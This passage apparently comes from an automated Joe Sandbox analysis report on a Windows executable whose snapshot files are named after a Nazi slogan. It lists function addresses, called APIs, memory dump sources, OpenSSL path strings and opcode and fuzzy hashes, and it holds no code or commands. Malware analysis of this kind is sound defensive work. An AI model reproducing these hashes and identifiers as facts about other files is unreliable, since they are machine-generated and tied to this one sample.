                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9D1FEB2B18A818EE750CFA5D4412AC37B1FB54B98B444336DE5EA7B99DF38E116D300
                                                                                                                                                                                                                                            Function 00007FF633D7CF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF633D7CF4B), ref: 00007FF633D7D07C
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF633D7CF4B), ref: 00007FF633D7D107
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                                                                                                            • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                            • Instruction ID: 2c5950925b83d471098b633555e2b176a57b7e2ae5c35f46bfe30bf5c18bcbd7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA91D772F1865189F7609FA594422BD2BA0BB44B88F545339DE0EB7B98DF3CE446E700
                                                                                                                                                                                                                                            Function 00007FFDFAF42DEC Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 173COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                            • String ID: Operation not permitted$unknown
                                                                                                                                                                                                                                            • API String ID: 1452528299-31098287
                                                                                                                                                                                                                                            • Opcode ID: 98fd99213be571fb8821e332285a7a3172dfad59924788fedf6360fac81b26b1
                                                                                                                                                                                                                                            • Instruction ID: 696d99d52c5d6ec4aaf27369f5cfd9aff575998e0b6f568fc759199f7b88c56e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98fd99213be571fb8821e332285a7a3172dfad59924788fedf6360fac81b26b1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A815B21F0A6438AFB509B14E874BBA23A9FF85794F440531E96E8B2EDDF7DE5419300
                                                                                                                                                                                                                                            Function 00007FF633D7F98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4170891091-0
                                                                                                                                                                                                                                            • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                            • Instruction ID: 546747b20ff5b2b5e960a0ff4e953700f2f0f40efcb574949882fd7f3944177b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7851C872F042118AFB24DFE4D9666BC2769AF44369F500336DD2DAABE5DF38A402D700
                                                                                                                                                                                                                                            Function 00007FF633D7577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2780335769-0
                                                                                                                                                                                                                                            • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                            • Instruction ID: b22458fa52191d5120275d4ec9f9ea44465807ec3a701729560ee272b97e6bff
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5951AD22E086418AFB10CFB1D4523BD37A2AB48B58F149639DE4DAB789DF38E4819341
                                                                                                                                                                                                                                            Function 00007FF633D620C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1956198572-0
                                                                                                                                                                                                                                            • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                            • Instruction ID: db1a6162a4bccb09ad1e453a8e51b53c1fea1e654d6ff293ae719b6ed9fb63b5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6911E921A0C54682F65487E9E5472796251EB88780FC45230DF6D97B9ACD2DE5D5A200
                                                                                                                                                                                                                                            Function 00007FF633D6D010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                                                                            • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                            • Instruction ID: 5704a215172bdf63649cad887ea3bb25f62a818bf907f5455577448c1c61c217
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26112E22B14F05CAEB00CFA0E8552B933A4FB59758F441F31DA6D967A4EF7CE1649340
                                                                                                                                                                                                                                            Function 00007FFDFAE8177B Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 433COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: $..\s\ssl\statem\extensions_srvr.c
                                                                                                                                                                                                                                            • API String ID: 0-1533168471
                                                                                                                                                                                                                                            • Opcode ID: bde783c250a104db30411a64944c1f6e3a051b34ae996dae0ae81df1dc00d0eb
                                                                                                                                                                                                                                            • Instruction ID: 9fbf5cadc4c249d9ed194d990ca1e404f2901719b24033300faab22521c874fb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bde783c250a104db30411a64944c1f6e3a051b34ae996dae0ae81df1dc00d0eb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C12A161B0864341EB68FB21D464EBEA7A0EF90788F454071EA7F4A6D9DF3ED645CB00
                                                                                                                                                                                                                                            Function 00007FFDFAD611D0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 316COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033758431.00007FFDFAD61000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAD60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033713501.00007FFDFAD60000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFADC4000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE13000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE6C000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE71000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE74000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034059986.00007FFDFAE75000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034101253.00007FFDFAE77000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfad60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007F767
                                                                                                                                                                                                                                            • String ID: _/yZ_&
                                                                                                                                                                                                                                            • API String ID: 1545044454-2545492802
                                                                                                                                                                                                                                            • Opcode ID: 65d28254b1fa7096358616b1c3a2e3d08ae438bc19f6638929b4b237d624a99b
                                                                                                                                                                                                                                            • Instruction ID: 74f25125fbc44b9784b2f9ec81afe5d2451b0e5bdd93e5b146d49c0bed4bf57e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65d28254b1fa7096358616b1c3a2e3d08ae438bc19f6638929b4b237d624a99b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04D1AEB2B0C56281EB688B15E824EB977A9FF55754F1441B1EA6E837C8FF3DE8418700
                                                                                                                                                                                                                                            Function 00007FFDFAE82554 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 296COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_rsa.c
                                                                                                                                                                                                                                            • API String ID: 0-2723262194
                                                                                                                                                                                                                                            • Opcode ID: 6e30abe6fdefd8749cd68edd071d20a41e65e46e175e23b0af5fe1f426fff78f
                                                                                                                                                                                                                                            • Instruction ID: 0ddaa097721a32a9d140a7c79436f37a524022e196faf3c9f560075a8cdaf329
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e30abe6fdefd8749cd68edd071d20a41e65e46e175e23b0af5fe1f426fff78f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DFC10421B1865289FB28AB65D464ABD26A1BF447CCF004176EE6F5BACDDF3DE6018340
                                                                                                                                                                                                                                            Function 00007FFDFAE82004 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 252COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007$E13331210
                                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_sess.c
                                                                                                                                                                                                                                            • API String ID: 1265583241-2868363209
                                                                                                                                                                                                                                            • Opcode ID: 330f54d2262cd26ac1954423d928ad117dd1f709cc5969c2bca93fc8397799ae
                                                                                                                                                                                                                                            • Instruction ID: db5c09a474b626d3b35754e0a460033e24827fed71f9754fe3b2cc6ae13dd1c7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 330f54d2262cd26ac1954423d928ad117dd1f709cc5969c2bca93fc8397799ae
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DFC1BE3270968186E768EB15D468BA933A4FB44B88F040176DE6F4B7CDDF7AE841CB10
                                                                                                                                                                                                                                            Function 00007FFDFAE81DAF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007B6570
                                                                                                                                                                                                                                            • String ID: ..\s\ssl\d1_srtp.c$H
                                                                                                                                                                                                                                            • API String ID: 4069847057-1001428523
                                                                                                                                                                                                                                            • Opcode ID: 5e5ac52720a642c798290dfeeca0c74eddbb25d0d6b8b3ad0b64af9bfd740cf0
                                                                                                                                                                                                                                            • Instruction ID: a59353da4603c1f31a6eeb976e38ff35457bb270284d313f69fcf74c5f50c079
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e5ac52720a642c798290dfeeca0c74eddbb25d0d6b8b3ad0b64af9bfd740cf0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D41C321F4D64285FB18BB25A460BB967A0AF40B84F4484B1DD3E8B7CDDE3EE952D700
                                                                                                                                                                                                                                            Function 00007FF633D85B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID: ?
                                                                                                                                                                                                                                            • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                            • Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                            • Instruction ID: 3cb196903c5e56fc7d9eb1f85b8d271bd60e7ec9e6446d419ff1f1ad6365f8fe
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A411812A0828246FB619BA9D40237A67A2EF91BA4F145335EE5C9ABD5DF3CF4419B00
